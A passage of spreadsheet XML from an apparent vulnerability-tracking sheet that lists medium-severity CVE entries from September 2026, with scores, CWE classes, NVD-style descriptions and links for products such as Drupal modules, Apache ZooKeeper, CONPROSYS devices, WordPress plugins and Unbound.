          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1191" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Drupal Digital Signage Framework allows Forceful Browsing. This issue affects Digital Signage Framework versions: from 0.0.0 to 2.6.1.</t>
        </is>
      </c>
      <c r="S1191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81166</t>
        </is>
      </c>
    </row>
    <row r="1192">
      <c r="A1192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81176</t>
        </is>
      </c>
      <c r="D1192" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1192" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1192" s="5" t="inlineStr"/>
      <c r="H1192" s="5" t="inlineStr"/>
      <c r="I1192" s="5" t="inlineStr"/>
      <c r="J1192" s="5" t="inlineStr"/>
      <c r="K1192" s="5" t="inlineStr"/>
      <c r="L1192" s="5" t="inlineStr"/>
      <c r="M1192" s="5" t="inlineStr"/>
      <c r="N1192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1192" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1192" s="5" t="inlineStr"/>
      <c r="Q1192" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1192" s="5" t="inlineStr">
        <is>
          <t>Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. Prior to 5.9.2, devalue.parse does not reject out-of-bounds indices that are greater than or equal to values.length in src/parse.js. A specially crafted untrusted payload can make the parser alternate between array representations, producing quadratic work as the payload grows and causing denial of service in applications that parse untrusted devalue data. This issue is fixed in version 5.9.2.</t>
        </is>
      </c>
      <c r="S1192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81176</t>
        </is>
      </c>
    </row>
    <row r="1193">
      <c r="A1193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81205</t>
        </is>
      </c>
      <c r="D1193" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1193" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1193" s="5" t="inlineStr"/>
      <c r="H1193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1193" s="5" t="inlineStr"/>
      <c r="J1193" s="5" t="inlineStr"/>
      <c r="K1193" s="5" t="inlineStr">
        <is>
          <t>miniorange:ldap_\/_active_directory_integration</t>
        </is>
      </c>
      <c r="L1193" s="5" t="inlineStr"/>
      <c r="M1193" s="5" t="inlineStr"/>
      <c r="N1193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1193" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1193" s="5" t="inlineStr"/>
      <c r="Q1193" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="R1193" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Drupal LDAP / Active Directory Integration allows LDAP Injection. This issue affects LDAP / Active Directory Integration versions: from 0.0.0 to 2.2.1.</t>
        </is>
      </c>
      <c r="S1193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81205</t>
        </is>
      </c>
    </row>
    <row r="1194">
      <c r="A1194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1194" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82775</t>
        </is>
      </c>
      <c r="D1194" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1194" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1194" s="5" t="inlineStr"/>
      <c r="H1194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1194" s="5" t="inlineStr"/>
      <c r="J1194" s="5" t="inlineStr"/>
      <c r="K1194" s="5" t="inlineStr"/>
      <c r="L1194" s="5" t="inlineStr"/>
      <c r="M1194" s="5" t="inlineStr"/>
      <c r="N1194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1194" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1194" s="5" t="inlineStr"/>
      <c r="Q1194" s="5" t="inlineStr">
        <is>
          <t>CWE-548</t>
        </is>
      </c>
      <c r="R1194" s="5" t="inlineStr">
        <is>
          <t>An exposure of information through directory listing issue exists in CONPROSYS M2M Gateway Series and CONPROSYS M2M Controller Series. Accessing a specific URL on this product may allow a remote unauthenticated attacker to obtain the directory list without authentication.</t>
        </is>
      </c>
      <c r="S1194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82775</t>
        </is>
      </c>
    </row>
    <row r="1195">
      <c r="A1195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1195" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82778</t>
        </is>
      </c>
      <c r="D1195" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1195" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1195" s="5" t="inlineStr"/>
      <c r="H1195" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1195" s="5" t="inlineStr"/>
      <c r="J1195" s="5" t="inlineStr"/>
      <c r="K1195" s="5" t="inlineStr"/>
      <c r="L1195" s="5" t="inlineStr"/>
      <c r="M1195" s="5" t="inlineStr"/>
      <c r="N1195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1195" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1195" s="5" t="inlineStr"/>
      <c r="Q1195" s="5" t="inlineStr">
        <is>
          <t>CWE-548</t>
        </is>
      </c>
      <c r="R1195" s="5" t="inlineStr">
        <is>
          <t>An exposure of information through directory listing issue exists in CONPROSYS PAC Series. Accessing a specific URL on this product may allow a remote unauthenticated attacker to obtain the directory list without authentication.</t>
        </is>
      </c>
      <c r="S1195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82778</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1196" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82782</t>
        </is>
      </c>
      <c r="D1196" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1196" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1196" s="5" t="inlineStr"/>
      <c r="H1196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1196" s="5" t="inlineStr"/>
      <c r="J1196" s="5" t="inlineStr"/>
      <c r="K1196" s="5" t="inlineStr"/>
      <c r="L1196" s="5" t="inlineStr"/>
      <c r="M1196" s="5" t="inlineStr"/>
      <c r="N1196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1196" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1196" s="5" t="inlineStr"/>
      <c r="Q1196" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1196" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability exists in CONPROSYS nano Series. Receiving a specially crafted request created and sent by a remote attacker may cause a denial-of-service (DoS) condition.</t>
        </is>
      </c>
      <c r="S1196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82782</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1197" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82785</t>
        </is>
      </c>
      <c r="D1197" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1197" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G1197" s="5" t="inlineStr"/>
      <c r="H1197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1197" s="5" t="inlineStr"/>
      <c r="J1197" s="5" t="inlineStr"/>
      <c r="K1197" s="5" t="inlineStr"/>
      <c r="L1197" s="5" t="inlineStr"/>
      <c r="M1197" s="5" t="inlineStr"/>
      <c r="N1197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1197" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1197" s="5" t="inlineStr"/>
      <c r="Q1197" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R1197" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow vulnerability exists in Remote I/O Coupler Unit (Server Type) CPSN-MCB271-*. Receiving a specially crafted request created and sent by a remote attacker may cause a denial-of-service (DoS) condition.</t>
        </is>
      </c>
      <c r="S1197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82785</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84501</t>
        </is>
      </c>
      <c r="D1198" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1198" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1198" s="5" t="inlineStr"/>
      <c r="H1198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1198" s="5" t="inlineStr"/>
      <c r="J1198" s="5" t="inlineStr"/>
      <c r="K1198" s="5" t="inlineStr"/>
      <c r="L1198" s="5" t="inlineStr"/>
      <c r="M1198" s="5" t="inlineStr"/>
      <c r="N1198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1198" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1198" s="5" t="inlineStr"/>
      <c r="Q1198" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R1198" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated attacker can inject arbitrary fake log lines into Apache ZooKeeper's operational log by sending a crafted add_auth("ensemble", ...) request containing newline characters (\n). When the ensemble name doesn't match, EnsembleAuthenticationProvider.handleAuthentication() logs the raw, unsanitized name via LOG.warn(). Because SLF4J's {} placeholder preserves embedded newlines, the attacker can forge complete log entries — with arbitrary timestamps, log levels, class names, and messages — that are visually indistinguishable from genuine ZooKeeper log output.
This issue affects Apache ZooKeeper: from 3.9.0 through 3.9.5, from 3.8.0 through 3.8.6.
Users are recommended to upgrade to version 3.8.7 or 3.9.6, which fixes the issue.</t>
        </is>
      </c>
      <c r="S1198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84501</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1199" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84533</t>
        </is>
      </c>
      <c r="D1199" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1199" s="5" t="inlineStr"/>
      <c r="H1199" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1199" s="5" t="inlineStr"/>
      <c r="J1199" s="5" t="inlineStr"/>
      <c r="K1199" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:watchos</t>
        </is>
      </c>
      <c r="L1199" s="5" t="inlineStr"/>
      <c r="M1199" s="5" t="inlineStr"/>
      <c r="N1199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1199" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1199" s="5" t="inlineStr"/>
      <c r="Q1199" s="5" t="inlineStr"/>
      <c r="R1199" s="5" t="inlineStr">
        <is>
          <t>A cryptographic issue was addressed with improved integrity checks. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, watchOS 27. An attacker in a privileged network position may be able to modify network traffic.</t>
        </is>
      </c>
      <c r="S1199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84533</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84906</t>
        </is>
      </c>
      <c r="D1200" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1200" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1200" s="5" t="inlineStr"/>
      <c r="H1200" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1200" s="5" t="inlineStr"/>
      <c r="J1200" s="5" t="inlineStr"/>
      <c r="K1200" s="5" t="inlineStr"/>
      <c r="L1200" s="5" t="inlineStr"/>
      <c r="M1200" s="5" t="inlineStr"/>
      <c r="N1200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1200" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1200" s="5" t="inlineStr"/>
      <c r="Q1200" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R1200" s="5" t="inlineStr">
        <is>
          <t>The Eventin WordPress plugin before 4.1.24 does not verify that a completed payment corresponds to the order it is applied to, confirming only that the payment gateway reports the transaction as successful, not its amount, currency, or which order it belongs to, allowing unauthenticated visitors to mark unpaid orders of any value as paid by replaying the transaction of a single genuine low-value payment.</t>
        </is>
      </c>
      <c r="S1200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84906</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85104</t>
        </is>
      </c>
      <c r="D1201" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1201" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G1201" s="5" t="inlineStr"/>
      <c r="H1201" s="5" t="inlineStr"/>
      <c r="I1201" s="5" t="inlineStr"/>
      <c r="J1201" s="5" t="inlineStr"/>
      <c r="K1201" s="5" t="inlineStr"/>
      <c r="L1201" s="5" t="inlineStr"/>
      <c r="M1201" s="5" t="inlineStr"/>
      <c r="N1201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1201" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1201" s="5" t="inlineStr"/>
      <c r="Q1201" s="5" t="inlineStr">
        <is>
          <t>CWE-924</t>
        </is>
      </c>
      <c r="R1201" s="5" t="inlineStr">
        <is>
          <t>In Sooma 2GEN brain stimulator, an attacker within Bluetooth range can make unauthenticated changes to brain stimulation
parameters.</t>
        </is>
      </c>
      <c r="S1201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85104</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1202" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85196</t>
        </is>
      </c>
      <c r="D1202" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1202" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G1202" s="5" t="inlineStr"/>
      <c r="H1202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1202" s="5" t="inlineStr"/>
      <c r="J1202" s="5" t="inlineStr"/>
      <c r="K1202" s="5" t="inlineStr"/>
      <c r="L1202" s="5" t="inlineStr"/>
      <c r="M1202" s="5" t="inlineStr"/>
      <c r="N1202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1202" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1202" s="5" t="inlineStr"/>
      <c r="Q1202" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1202" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Reflected XSS in Articles Anywhere extension for Joomla &lt; 20.0.0, Users Anywhere extension for Joomla &lt; 2.1.0 - Articles Anywhere Pro and Users Anywhere Pro return values from request-input data tags without making them safe for the context in which the tag is used. Joomla's string input filter does not make the same value safe for HTML text, an HTML attribute and a URL. A visitor-controlled request value can therefore become an executable URL or a new event attribute in output configured by a site author.</t>
        </is>
      </c>
      <c r="S1202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85196</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85501</t>
        </is>
      </c>
      <c r="D1203" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1203" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G1203" s="5" t="inlineStr"/>
      <c r="H1203" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1203" s="5" t="inlineStr"/>
      <c r="J1203" s="5" t="inlineStr"/>
      <c r="K1203" s="5" t="inlineStr"/>
      <c r="L1203" s="5" t="inlineStr"/>
      <c r="M1203" s="5" t="inlineStr"/>
      <c r="N1203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1203" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1203" s="5" t="inlineStr"/>
      <c r="Q1203" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R1203" s="5" t="inlineStr">
        <is>
          <t>Novel vulnerabilities to launch algorithmic complexity attacks on DNSSEC have been researched under the term 'ReTrap'. These result in degradation of service when malicious zones are used to serve the algorithmic complexity vulnerabilities. NLnet Labs Unbound up to and including 1.26.0 is vulnerable to some of them. TagTrap, where  the triple(Zone, Algo, KeyTag) matching mechanism introduces a significant attack vector when resolvers handle malicious responses containing numerous mismatched DNSKEY, RRSIG, and DS record. DelegationTrap, where constructing the chain-of-trust requires iterative validation of DNSKEY and DS records from the root zone downward. For deeply nested domains, this results in significant computational overhead. NsecTrap, where  responses with excessive invalid NSEC records compel the resolver to validate each one. AdditionalTrap, where Unbound by default would try to DNSSEC validate the ADDITIONAL section as well. This can be exploited to waste validation resources by malicious users.</t>
        </is>
      </c>
      <c r="S1203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85501</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1204" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86118</t>
        </is>
      </c>
      <c r="D1204" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1204" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1204" s="5" t="inlineStr"/>
      <c r="H1204" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1204" s="5" t="inlineStr"/>
      <c r="J1204" s="5" t="inlineStr"/>
      <c r="K1204" s="5" t="inlineStr"/>
      <c r="L1204" s="5" t="inlineStr"/>
      <c r="M1204" s="5" t="inlineStr"/>
      <c r="N1204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1204" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1204" s="5" t="inlineStr"/>
      <c r="Q1204" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1204" s="5" t="inlineStr">
        <is>
          <t>gonic versions before 0.22.0 fail to validate administrator privileges in the startScan endpoint, allowing any authenticated user to trigger media library rescans. Attackers can repeatedly call the startScan endpoint to force CPU and I/O-intensive filesystem operations, causing denial of service on multi-user instances.</t>
        </is>
      </c>
      <c r="S1204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86118</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1205" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86174</t>
        </is>
      </c>
      <c r="D1205" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1205" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1205" s="5" t="inlineStr"/>
      <c r="H1205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1205" s="5" t="inlineStr"/>
      <c r="J1205" s="5" t="inlineStr"/>
      <c r="K1205" s="5" t="inlineStr"/>
      <c r="L1205" s="5" t="inlineStr"/>
      <c r="M1205" s="5" t="inlineStr"/>
      <c r="N1205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1205" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P1205" s="5" t="inlineStr"/>
      <c r="Q1205" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1205" s="5" t="inlineStr">
        <is>
          <t>Plane through 1.4.2 fails to validate that issues belong to the deploy board's project in the public comment endpoint. Authenticated attackers can post comments to arbitrary issues across workspaces by supplying an issue_id parameter to the public deploy-board comment endpoint.</t>
        </is>
      </c>
      <c r="S1205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86174</t>
        </is>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86475</t>
        </is>
      </c>
      <c r="D1206" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1206" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1206" s="5" t="inlineStr"/>
      <c r="H1206" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1206" s="5" t="inlineStr"/>
      <c r="J1206" s="5" t="inlineStr"/>
      <c r="K1206" s="5" t="inlineStr"/>
      <c r="L1206" s="5" t="inlineStr"/>
      <c r="M1206" s="5" t="inlineStr"/>
      <c r="N1206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1206" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1206" s="5" t="inlineStr"/>
      <c r="Q1206" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1206" s="5" t="inlineStr">
        <is>
          <t>The Appointment Hour Booking WordPress plugin before 1.5.95 does not check every appointment in a booking submission against the capacity configured for its own slot, allowing unauthenticated visitors to take slots that are already fully booked.</t>
        </is>
      </c>
      <c r="S1206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86475</t>
        </is>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86755</t>
        </is>
      </c>
      <c r="D1207" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1207" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1207" s="5" t="inlineStr"/>
      <c r="H1207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1207" s="5" t="inlineStr"/>
      <c r="J1207" s="5" t="inlineStr"/>
      <c r="K1207" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1207" s="5" t="inlineStr"/>
      <c r="M1207" s="5" t="inlineStr"/>
      <c r="N1207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1207" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1207" s="5" t="inlineStr"/>
      <c r="Q1207" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1207" s="5" t="inlineStr">
        <is>
